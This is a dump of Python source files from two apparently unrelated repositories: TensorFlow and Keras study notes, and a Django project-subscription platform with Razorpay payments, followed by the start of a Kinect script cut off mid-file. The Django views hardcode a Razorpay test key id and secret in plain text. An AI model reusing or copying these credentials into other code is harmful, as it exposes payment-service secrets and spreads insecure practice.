layers\r\nxor.add(Dense(64,input_dim=2))\r\nxor.add(Activation('relu')) # relu似乎很有用,可使准确率达到100%\r\nxor.add(Dense(8))\r\nxor.add(Activation('relu'))\r\nxor.add(Dense(2))\r\nxor.add(Activation('softmax'))\r\n\r\nxor.compile(loss=\"binary_crossentropy\",optimizer=\"adam\",metrics=['accuracy'])\r\n\r\nxor.summary()\r\n\r\nhistory = xor.fit(X,y,epochs=100,verbose=0)\r\n\r\nscore = xor.evaluate(X,y)\r\nprint(\"\\nAccuracy:\",score[-1])\r\n\r\nprint(\"\\nPredictions:\")\r\nprint(xor.predict_proba(X))" }, { "alpha_fraction": 0.615877091884613, "alphanum_fraction": 0.6274007558822632, "avg_line_length": 21.342857360839844, "blob_id": "54f99ee20052040e57c4298167b1831c30985d78", "content_id": "ca00586680dd861c4b5f72c614188250e60d5cb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 805, "license_type": "no_license", "max_line_length": 77, "num_lines": 35, "path": "/Data Structures-Algorithms/P0/Task1.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files.\n\"\"\"\nimport csv\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\nres = []\nfor i in texts:\n res.append(i[0].replace(\" \",\"\"))\n res.append(i[1].replace(\" \",\"\"))\nn = len(set(res))\n\nres1 = []\nfor j in calls:\n res1.append(j[0].replace(\" \",\"\"))\n res1.append(j[1].replace(\" \",\"\"))\nm = len(set(res1))\n\nprint(\"There are {} different telephone numbers in the records.\".format(n+m))\n\n\"\"\"\nTASK 1:\nHow many different telephone numbers are there in the records? \nPrint a message:\n\"There are <count> different telephone numbers in the records.\"\n\"\"\"\n# 时间复杂度:O(n)\n# 空间复杂度:O(n)" }, { "alpha_fraction": 0.6557919383049011, "alphanum_fraction": 0.6709219813346863, "avg_line_length": 27.375, "blob_id": "96476395ea589bca4d474c7d4094ed84df53742f", "content_id": "dc48f8d57a19264963f515a029406259b7bb681d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2115, "license_type": "no_license", "max_line_length": 83, "num_lines": 72, "path": "/TensorFlow/Linear algebra/sandbox.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "import tensorflow as tf\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nfrom quiz import get_weights,get_biases,linear\r\n\r\ndef mnist_features_labels(n_labels):\r\n \"\"\"\r\n Gets the first <n> labels from the MNIST dataset\r\n :param n_labels: Number of labels to use\r\n :return: Tuple of feature list and label list\r\n \"\"\"\r\n\r\n mnist_features = []\r\n mnist_labels = []\r\n\r\n mnist = input_data.read_data_sets('/datasets/ud730/mnist',one_hot=True)\r\n\r\n # In order to make quizzes run faster,we're only lookong at 10000 images\r\n for mnist_feature,mnist_label in zip(*mnist.train.next_batch(10000)):\r\n\r\n # Add features and labels if it's for the first <n>th labels\r\n if mnist_label[:n_labels].any():\r\n mnist_features.append(mnist_feature)\r\n mnist_labels.append(mnist_label[:n_labels])\r\n\r\n return mnist_features,mnist_labels\r\n\r\n# Number of features (28*28 image is 784 features)\r\nn_features = 784\r\n# Number of labels\r\nn_labels = 3\r\n\r\n# Features and Labels\r\nfeatures = tf.placeholder(tf.float32)\r\nlabels = tf.placeholder(tf.float32)\r\n\r\n# Weights and Biases\r\nW = get_weights(n_features,n_labels)\r\nb = get_biases(n_labels)\r\n\r\n# Linear Function xW + b\r\nlogits = linear(features,W,b)\r\n\r\n# Training data\r\ntrain_features,train_labels = mnist_features_labels(n_labels)\r\n\r\nwith tf.Session() as session:\r\n session.run(tf.global_variables_initializer())\r\n\r\n prediction = tf.nn.softmax(logits)\r\n\r\n # Cross entropy\r\n # This quantifies how far off the prediction were.\r\n cross_entropy = -tf.reduce_sum(labels * tf.log(prediction),reduction_indices=1)\r\n\r\n # Training loss\r\n loss = tf.reduce_mean(cross_entropy)\r\n\r\n # Rate at which the weights are changed\r\n learning_rate = 0.08\r\n\r\n # GRADIENT Descent\r\n # This is the method used to train the model\r\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss)\r\n\r\n # Run optimizer and get loss\r\n _, l = session.run(\r\n [optimizer,loss],\r\n feed_dict={features:train_features,labels:train_labels}\r\n )\r\n\r\n# Print loss\r\nprint('Loss:{}'.format(l))\r\n" }, { "alpha_fraction": 0.5943832993507385, "alphanum_fraction": 0.6062536239624023, "avg_line_length": 23.04347801208496, "blob_id": "c4369a2e018ab687941e5a88b9d2d3e736155c5d", "content_id": "c837dca73fb63434f0b0ad658f8e62737a5f242a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3896, "license_type": "no_license", "max_line_length": 88, "num_lines": 138, "path": "/TensorFlow/save_load_w_b.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "## 通过一个简单的例子保存weights和bias Tensors\r\nimport tensorflow as tf\r\n\r\n# 文件保存路径\r\nsave_file = './model.ckpt'\r\n\r\n# 两个Tensor变量:权重和偏置项\r\nweights = tf.Variable(tf.truncated_normal([2,3]))\r\nbias = tf.Variable(tf.truncated_normal([3]))\r\n\r\n# 用来存取Tensor变量的类\r\nsaver = tf.train.Saver()\r\n\r\nwith tf.Session() as sess:\r\n # 初始化所有变量\r\n sess.run(tf.global_variables_initializer())\r\n\r\n # 显示变量和权重\r\n print('Weights:')\r\n print(sess.run(weights))\r\n print('Bias:')\r\n print(sess.run(bias))\r\n\r\n # 保存模型\r\n saver.save(sess,save_file)\r\n\r\n# 移除之前的权重和偏置项\r\ntf.reset_default_graph()\r\n\r\n# 两个变量:权重和偏置项\r\n# 依然要创建这两个变量\r\nweights = tf.Variable(tf.truncated_normal([2,3]))\r\nbias = tf.Variable(tf.truncated_normal([3]))\r\n\r\n# 用来存取Tensor变量的类\r\nsaver = tf.train.Saver()\r\n\r\nwith tf.Session() as sess:\r\n # 加载权重和偏置项\r\n saver.restore(sess,save_file) # tf.train.Saver.restore()函数\r\n # 把之前保存的数据加载到weights和bias中。\r\n\r\n # 显示权重和偏置项\r\n print('Weights:')\r\n print(sess.run(weights))\r\n print('Bias:')\r\n print(sess.run(bias))\r\n\r\n# 移除之前的Tensors和运算\r\ntf.reset_default_graph()\r\n\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nimport numpy as np\r\n\r\nleaning_rate = 0.001\r\nn_input = 784 # MNIST数据输入(图片尺寸:28*28)\r\nn_classes = 10 # MNIST总计类别(数字0-9)\r\n\r\n# 加载MNIST数据\r\nmnist = input_data.read_data_sets('.',one_hot=True)\r\n\r\n# 特征和标签\r\nfeatures = tf.placeholder(tf.float32,[None,n_input])\r\nlabels = tf.placeholder(tf.float32,[None,n_classes])\r\n\r\n# 权重和偏置项\r\nweights = tf.Variable(tf.random_normal([n_input,n_classes]))\r\nbias = tf.Variable(tf.random_normal([n_classes]))\r\n\r\n# Logits - xW + b\r\nlogits = tf.add(tf.matmul(features,weights),bias)\r\n\r\n# 定义损失函数和优化器\r\ncost = tf.reduce_mean(\r\n tf.nn.softmax_cross_entropy_with_logits(logits=logits,labels=labels)\r\n)\r\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=leaning_rate).minimize(cost)\r\n\r\n# 计算准确率\r\ncorrect_prediction = tf.equal(tf.argmax(logits,1),tf.argmax(labels,1))\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\r\n\r\n# 训练模型并保存权重\r\nimport math\r\n\r\nsave_file = './train_model.ckpt'\r\nbatch_size = 128\r\nn_epochs = 100\r\n\r\nsaver = tf.train.Saver()\r\n\r\n# 启动图\r\nwith tf.Session() as sess:\r\n sess.run(tf.global_variables_initializer())\r\n\r\n # 训练循环\r\n for epoch in range(n_epochs):\r\n total_batch = math.ceil(mnist.train.num_examples / batch_size)\r\n\r\n # 遍历所有batch\r\n for i in range(total_batch):\r\n batch_features,batch_labels = mnist.train.next_batch(batch_size)\r\n sess.run(\r\n optimizer,\r\n feed_dict={features:batch_features,labels:batch_labels}\r\n )\r\n\r\n # 每运行10个epoch打印一次状态\r\n if epoch % 10 == 0:\r\n valid_accuracy = sess.run(\r\n accuracy,\r\n feed_dict={\r\n features:mnist.validation.images,\r\n labels:mnist.validation.labels\r\n }\r\n )\r\n print('Epoch{:<3} - Validation Accuracy:{}'.format(\r\n epoch,\r\n valid_accuracy\r\n ))\r\n\r\n # 保存模型\r\n saver.save(sess,save_file)\r\n print('Trained Model Saved.')\r\n\r\nsaver = tf.train.Saver()\r\n\r\n# 加载图\r\nwith tf.Session() as sess:\r\n saver.restore(sess,save_file)\r\n\r\n test_accuracy = sess.run(\r\n accuracy,\r\n feed_dict={\r\n features:mnist.test.images,labels:mnist.test.labels\r\n }\r\n )\r\nprint('Test Accuracy:{}'.format(test_accuracy))" }, { "alpha_fraction": 0.7052767276763916, "alphanum_fraction": 0.7271557450294495, "avg_line_length": 19.52777862548828, "blob_id": "1598cd4c6907d1aee080ba0bfdd68f2c11a5665d", "content_id": "9aa3964e4509f9b994291ddac0c0dd5e3bb5005a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1059, "license_type": "no_license", "max_line_length": 84, "num_lines": 36, "path": "/Keras/Keras_structure.py", "repo_name": "ML-ZimingMeng/Study-Notes", "src_encoding": "UTF-8", "text": "### 以下为Kera模型介绍,本程序无法执行\r\n## 序列模型\r\nfrom keras.models import Sequential\r\n\r\n# Create the Sequential model\r\n# keras.models.Sequential类是神经网络模型的封装容器。\r\n# 它会提供常见的函数,如fit(),evaluate(),compile()\r\nmodel = Sequential()\r\n\r\n## 层\r\n# kera层就像神经网络层。有全连接层、最大池化层和激活层。\r\n# 可以使用add()函数添加层。\r\nfrom keras.models import Sequential\r\nfrom keras.layers.core import Dense,Activation,Flatten\r\n\r\n# 创建序列模型\r\nmodel = Sequential()\r\n\r\n# 第一层-添加有128个节点的全连接层以及32个节点的输入层\r\nmodel.add(Dense(128,input_dim=32))\r\n\r\n# 第二层-添加softmax激活层\r\nmodel.add(Activation('softmax'))\r\n\r\n# 第三层-添加全连接层\r\nmodel.add(Dense(10))\r\n\r\n# 第四层-添加sigmoid激活层\r\nmodel.add(Activation('sigmoid'))\r\n\r\n# 对模型进行编译\r\nmodel.compile(loss=\"categorical_crossentropy\",optimizer=\"adam\",metrics=['accuracy'])\r\n\r\nmodel.fit(X,y,epochs=1000,verbose=0)\r\n\r\nmodel.evaluate()\r\n\r\n" } ]
16
prinjal-boruah/new_me
https://github.com/prinjal-boruah/new_me
eab9aed04dadd4885e04a8d7614a3b9c158b3b6f
910d3e88be7ae48d51735bcb353e936b40dd0df6
362ac1757d81606b8cd1a036423c2f9a86cd81ca
refs/heads/master
2022-07-03T11:47:01.629064
2020-05-16T07:08:39
2020-05-16T07:08:39
264,379,820
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6817406415939331, "alphanum_fraction": 0.703071653842926, "avg_line_length": 36.20634841918945, "blob_id": "71cbfb15cdaa5e62eb2a22740ed915f3e9009eef", "content_id": "81875a736eb92b9fb864193095e8d135c728a45b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2344, "license_type": "permissive", "max_line_length": 110, "num_lines": 63, "path": "/django-dashboard-atlantis-dark/platform_app/models.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass Organization(models.Model):\n user = models.OneToOneField(User, on_delete = models.CASCADE)\n org_name = models.CharField(max_length=150)\n comm_address1 = models.TextField()\n comm_address2 = models.TextField()\n comm_country = models.CharField(max_length=150)\n comm_state = models.CharField(max_length=150)\n comm_city = models.CharField(max_length=150)\n comm_phone = models.BigIntegerField()\n comm_email = models.EmailField()\n comm_gstin = models.CharField(max_length=150)\n bill_address1 = models.TextField()\n bill_address2 = models.TextField()\n bill_country = models.CharField(max_length=150)\n bill_state = models.CharField(max_length=150)\n bill_city = models.CharField(max_length=150)\n bill_phone = models.BigIntegerField()\n bill_email = models.EmailField()\n bill_gstin = models.CharField(max_length=150)\n\n def __str__(self):\n return str(self.org_name)\n\n\nclass SubscriptionPlan(models.Model):\n plan = models.CharField(max_length=150)\n description = models.TextField()\n number_of_stakeholders = models.IntegerField()\n price = models.BigIntegerField()\n created = models.DateTimeField()\n validity = models.IntegerField()\n\n def __str__(self):\n return str(self.plan)\n\n\nclass Project(models.Model):\n organization = models.ForeignKey(Organization, on_delete = models.CASCADE)\n user = models.ForeignKey(User, on_delete = models.CASCADE, blank = True, null = True)\n title = models.CharField(max_length=150)\n description = models.TextField()\n start_date = models.CharField(max_length=200)\n end_date = models.CharField(max_length=200)\n duration = models.IntegerField(blank = True, null = True)\n subscribed_plan = models.ForeignKey(SubscriptionPlan, on_delete=models.PROTECT, blank = True, null = True)\n razorpay_order_id = models.CharField(max_length = 100, null=True, blank= True)\n\n def __str__(self):\n return str(self.title)\n\n\nclass Card(models.Model):\n organization = models.ForeignKey(Organization, on_delete = models.CASCADE)\n card_number = models.BigIntegerField()\n name_on_card = models.CharField(max_length = 100)\n expiry_date = models.CharField(max_length=4)\n \n def __str__(self):\n return str(self.organization)\n" }, { "alpha_fraction": 0.7052631378173828, "alphanum_fraction": 0.7052631378173828, "avg_line_length": 20.16666603088379, "blob_id": "8ab2bd5e1370e2bb15b5e8c9cf7e3f9e1b22aea1", "content_id": "b3afe031e926dfa7a1eb8c1d14932b79d6feab9f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 380, "license_type": "permissive", "max_line_length": 53, "num_lines": 18, "path": "/django-dashboard-atlantis-dark/api_app/serializers.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom django.contrib.auth.models import User\nfrom platform_app.models import Project\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = ('username', 'password')\n\n\n\nclass ProjectSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Project\n fields = '__all__'" }, { "alpha_fraction": 0.6660899519920349, "alphanum_fraction": 0.6678200960159302, "avg_line_length": 40.35714340209961, "blob_id": "47746e9316e01e3538fe2d2510f24e0d6940bd69", "content_id": "c97feef05ba7c8a3a5b4094887907ad35fb5bd86", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "permissive", "max_line_length": 77, "num_lines": 14, "path": "/django-dashboard-atlantis-dark/platform_app/urls.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.projects, name='projects1'),\n path('projects', views.projects, name='projects'),\n path('create_project', views.create_project, name='create_project'),\n path('addcard/', views.addCard, name='addcard'),\n path('create_org', views.CreateOrg.as_view({'get': 'list'})),\n path('create_proj', views.CreateProj.as_view({'get': 'list'})),\n path('subscribe/<int:pk>', views.ProjectSubscription.as_view()),\n\n path('postdetails/<int:pk>/', views.postMEdetails, name = \"postdetails\"),\n]" }, { "alpha_fraction": 0.7133973836898804, "alphanum_fraction": 0.7269644141197205, "avg_line_length": 33.686275482177734, "blob_id": "9f359638b94f4004b5bf98089095208c54ac851e", "content_id": "e669c00d5dff813661d1a51c1402b6422d494375", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1769, "license_type": "permissive", "max_line_length": 108, "num_lines": 51, "path": "/django-dashboard-atlantis-dark/api_app/views.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.status import (\n HTTP_400_BAD_REQUEST,\n HTTP_404_NOT_FOUND,\n HTTP_200_OK\n)\nfrom django.http import Http404\nfrom django.contrib.auth import authenticate\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import AllowAny\nfrom django.contrib.auth.models import User\nfrom .serializers import UserSerializer, ProjectSerializer\nfrom platform_app.models import Project\nfrom rest_framework.views import APIView\n\n\n@csrf_exempt\n@api_view([\"POST\"])\n@permission_classes((AllowAny,))\ndef login_user(request):\n username = request.data.get(\"username\")\n password = request.data.get(\"password\")\n if username is None or password is None:\n return Response({'error': 'Please provide both username and password'}, status=HTTP_400_BAD_REQUEST)\n\n user = authenticate(username=username, password=password)\n\n if not user:\n return Response({'error': 'Invalid Credentials'}, status=HTTP_404_NOT_FOUND)\n\n token, _ = Token.objects.get_or_create(user=user)\n\n user = User.objects.get(username=user)\n \n return Response({'token': token.key, 'user': user.id, 'username': user.username}, status=HTTP_200_OK)\n\n\nclass ProjectsApiView(APIView):\n def get_object(self, pk):\n try:\n return Project.objects.filter(user=pk)\n except Project.DoesNotExist:\n raise Http404\n\n def get(self, request, pk):\n projects = self.get_object(pk)\n Projects = ProjectSerializer(projects, context={\"request\": request}, many=True)\n return Response(Projects.data)\n" }, { "alpha_fraction": 0.6931818127632141, "alphanum_fraction": 0.6931818127632141, "avg_line_length": 24.285715103149414, "blob_id": "1e5ff952e4720db42208a6994ea55f7e76b9aea2", "content_id": "275882b31f72200b78a18724dfd5b05ab5413839", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 176, "license_type": "permissive", "max_line_length": 67, "num_lines": 7, "path": "/django-dashboard-atlantis-dark/api_app/urls.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('api/login', views.login_user),\n path('api/projects/<int:pk>', views.ProjectsApiView.as_view()),\n]" }, { "alpha_fraction": 0.6463870406150818, "alphanum_fraction": 0.6557309031486511, "avg_line_length": 33.407142639160156, "blob_id": "b82a6d821f9da97e6a2670392fc9166ce94d1a5e", "content_id": "78e426f9e9a57ca40d267e2fd97d805315d72bc5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4816, "license_type": "permissive", "max_line_length": 114, "num_lines": 140, "path": "/django-dashboard-atlantis-dark/platform_app/views.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.template import loader\nfrom django.http import HttpResponse\nfrom django import template\nfrom django.contrib.auth import authenticate, login\nfrom .models import *\nfrom django.forms.utils import ErrorList\n# from .forms import LoginForm, SignUpForm\nfrom datetime import datetime\n# import razorpay\n# import requests\nfrom rest_framework import viewsets, generics, status\nfrom .serializers import *\nfrom rest_framework.response import Response\nfrom rest_framework.status import (\n HTTP_400_BAD_REQUEST,\n HTTP_404_NOT_FOUND,\n HTTP_200_OK\n)\nfrom django.http import HttpResponse, Http404\nfrom rest_framework.views import APIView\nimport razorpay\nimport requests\n\nnow = datetime.now()\n\n@login_required(login_url=\"/login/\")\ndef projects(request):\n try:\n org = Organization.objects.get(user=request.user.id)\n proj = Project.objects.filter(organization=org.id)\n print(proj)\n proj_id_list = []\n for x in proj:\n proj_id_list.append(x.id)\n context = {\n # \"org\": Organization.objects.get(user=request.user.id),\n # \"subscriptions\": Subscription.objects.filter(project__in=proj_id_list),\n # \"project\": proj\n }\n return render(request, \"projects.html\", {\"project\": proj})\n except:\n print(\"Organization does not exist\")\n return render(request, \"projects.html\")\n\n\ndef create_project(request):\n print(Organization.objects.get(user = request.user))\n try:\n context = {\n \"org\" : Organization.objects.get(user = request.user),\n \"plans\": SubscriptionPlan.objects.all(),\n }\n except:\n return render(request, \"create_project.html\")\n return render(request, \"create_project.html\", context)\n\n\nclass CreateOrg(viewsets.ViewSet):\n def list(self, request):\n queryset = Organization.objects.all()\n serializer = OrganizationSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n serializer = OrganizationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass CreateProj(viewsets.ViewSet):\n def list(self, request):\n queryset = Project.objects.all()\n serializer = ProjectSerializer(queryset, many=True)\n return Response(serializer.data)\n\n def post(self, request):\n serializer = ProjectSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProjectSubscription(APIView):\n def get_object(self, pk):\n try:\n return Project.objects.get(pk=pk)\n except User.DoesNotExist:\n raise Http404\n\n def get(self, request, pk):\n project = self.get_object(pk)\n serializer = ProjectPlanSerializer(project)\n return Response(serializer.data)\n\n def put(self, request, pk, format=None):\n project = self.get_object(pk)\n new_dict = dict(request.data)\n sub_id = new_dict['subscribed_plan']\n sub_price = SubscriptionPlan.objects.get(id=int(sub_id[0])).price\n client=razorpay.Client(auth=(\"rzp_test_2tx97L0V09FUM6\",\"QOWTRaArqW2Gj8O6rUxtEVwR\"))\n Data = {'amount':str(int(sub_price)*100),\"currency\":'INR',\"receipt\":'order_rcptid_11',\"payment_capture\":1}\n val = client.order.create(data=Data)\n order_id = val['id']\n new_dict['razorpay_order_id'] = order_id\n new_dict.update({'subscribed_plan':int(sub_id[0])})\n serializer = ProjectPlanSerializer(project, data=new_dict)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\ndef addCard(request):\n context = {\n \"sub\": Project.objects.last()\n }\n return render(request, \"card_deatils.html\",context)\n\ndef postMEdetails(request, pk):\n project_obj = Project.objects.get(id=pk)\n\n API_ENDPOINT = \"http://localhost:9000/register_user\"\n\n data = {'username': request.user.username,\n 'email':request.user.email,\n 'title':project_obj.title,\n 'summary': project_obj.description,\n 'start': project_obj.start_date,\n 'end': project_obj.end_date,\n 'status': \"New\" \n }\n\n r = requests.post(url = API_ENDPOINT, data = data)\n\n print(data)\n\n return redirect(\"projects\")" }, { "alpha_fraction": 0.522352933883667, "alphanum_fraction": 0.6023529171943665, "avg_line_length": 22.61111068725586, "blob_id": "39629008f8c183bc2cdbe8987f6a6e61e76a67b4", "content_id": "73481695fb9f8e0de08ef56c86ae33025d318de5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 425, "license_type": "permissive", "max_line_length": 74, "num_lines": 18, "path": "/django-dashboard-atlantis-dark/platform_app/migrations/0005_project_razorpay_order_id.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0.5 on 2020-05-16 04:46\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('platform_app', '0004_auto_20200516_0246'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='project',\n name='razorpay_order_id',\n field=models.CharField(blank=True, max_length=100, null=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5386841893196106, "alphanum_fraction": 0.5552631616592407, "avg_line_length": 44.238094329833984, "blob_id": "7a463ae899e28caaafe5a47bf8043a3360d2e6d5", "content_id": "555a5543459076ea6c4ac181f61e584195b263f9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3800, "license_type": "permissive", "max_line_length": 129, "num_lines": 84, "path": "/django-dashboard-atlantis-dark/platform_app/migrations/0001_initial.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.15 on 2020-05-14 09:13\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Card',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('card_number', models.BigIntegerField()),\n ('name_on_card', models.CharField(max_length=100)),\n ('expiry_date', models.CharField(max_length=4)),\n ],\n ),\n migrations.CreateModel(\n name='Organization',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('org_name', models.CharField(max_length=150)),\n ('comm_address1', models.TextField()),\n ('comm_address2', models.TextField()),\n ('comm_country', models.CharField(max_length=150)),\n ('comm_state', models.CharField(max_length=150)),\n ('comm_city', models.CharField(max_length=150)),\n ('comm_phone', models.BigIntegerField()),\n ('comm_email', models.EmailField(max_length=254)),\n ('comm_gstin', models.CharField(max_length=150)),\n ('bill_address1', models.TextField()),\n ('bill_address2', models.TextField()),\n ('bill_country', models.CharField(max_length=150)),\n ('bill_state', models.CharField(max_length=150)),\n ('bill_city', models.CharField(max_length=150)),\n ('bill_phone', models.BigIntegerField()),\n ('bill_email', models.EmailField(max_length=254)),\n ('bill_gstin', models.CharField(max_length=150)),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=150)),\n ('description', models.TextField()),\n ('start_date', models.DateField()),\n ('end_date', models.DateField()),\n ('duration', models.IntegerField()),\n ('organization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='platform_app.Organization')),\n ],\n ),\n migrations.CreateModel(\n name='SubscriptionPlan',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('plan', models.CharField(max_length=150)),\n ('description', models.TextField()),\n ('number_of_stakeholders', models.IntegerField()),\n ('price', models.BigIntegerField()),\n ('created', models.DateTimeField()),\n ('validity', models.IntegerField()),\n ],\n ),\n migrations.AddField(\n model_name='project',\n name='subscribed_plan',\n field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='platform_app.SubscriptionPlan'),\n ),\n migrations.AddField(\n model_name='card',\n name='organization',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='platform_app.Organization'),\n ),\n ]\n" }, { "alpha_fraction": 0.588921308517456, "alphanum_fraction": 0.6180757880210876, "avg_line_length": 27.58333396911621, "blob_id": "5bfb66241a1aac5cdf8579601110a8e1f034ef64", "content_id": "96588dc3e31248461b1d8dc4055d8b8036f6a498", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 686, "license_type": "permissive", "max_line_length": 140, "num_lines": 24, "path": "/django-dashboard-atlantis-dark/platform_app/migrations/0003_auto_20200515_0419.py", "repo_name": "prinjal-boruah/new_me", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.15 on 2020-05-14 22:49\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('platform_app', '0002_project_user'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='project',\n name='duration',\n field=models.IntegerField(blank=True, null=True),\n ),\n migrations.AlterField(\n model_name='project',\n name='subscribed_plan',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='platform_app.SubscriptionPlan'),\n ),\n ]\n" } ]
9
cjb22/Ping-Pong-Shooter
https://github.com/cjb22/Ping-Pong-Shooter
a91dca66b96f1b394add0ab702386cca1683b98c
8d848cf9f127a0ff71db4973be9d71fb848cfd0d
3cddaa84304c69186ff7575ef18244f9deff4946
refs/heads/master
2020-06-11T07:30:23.986036
2019-08-23T10:19:36
2019-08-23T10:19:36
193,890,844
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6118375658988953, "alphanum_fraction": 0.6421197652816772, "avg_line_length": 36.74026107788086, "blob_id": "0d4e7aba7aee11dcdee7b0d8223fdc1cd4cf4122", "content_id": "3cbc7110cf52d150dd9e903a4bed42d806817ea3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17436, "license_type": "no_license", "max_line_length": 167, "num_lines": 462, "path": "/Kinect.py", "repo_name": "cjb22/Ping-Pong-Shooter", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport numpy as np\nimport freenect\nimport cv2\nimport frame_convert2\nimport time\nimport math\nimport subprocess\nimport os\nos.system (\"sudo pigpiod\")\ntime.sleep(1) # Might not be necessary\nimport pigpio \n\n\n\n\n#Set up OpenCV named windows to display the picture\ncv2.namedWindow('Depth')\n# Depth = 480 x 640\n#cv2.namedWindow('Video')\nprint('Press ESC in window to stop')\n\n#Set up slidebar controls\ndef nothing(x):\n pass\ncv2.createTrackbar('Canny Low','Depth',0,255,nothing)\ncv2.setTrackbarPos('Canny Low', 'Depth',5)\ncv2.createTrackbar('Canny High','Depth',0,255,nothing)\ncv2.setTrackbarPos('Canny High', 'Depth',35)\ncv2.createTrackbar('Contour Length','Depth',0,6000,nothing)\ncv2.setTrackbarPos('Contour Length', 'Depth',1500)\ncv2.createTrackbar('Contour Area','Depth',0,200,nothing)\ncv2.setTrackbarPos('Contour Area', 'Depth',10)\n#cv2.createTrackbar('Segment Length','Depth',1,500,nothing)\n#cv2.setTrackbarPos('Segment Length', 'Depth',200)\n#cv2.createTrackbar('Closeness Threshold','Depth',0,300,nothing)\n#cv2.setTrackbarPos('Closeness Threshold', 'Depth',80)\n\npi = pigpio.pi() \n\n#Kinect 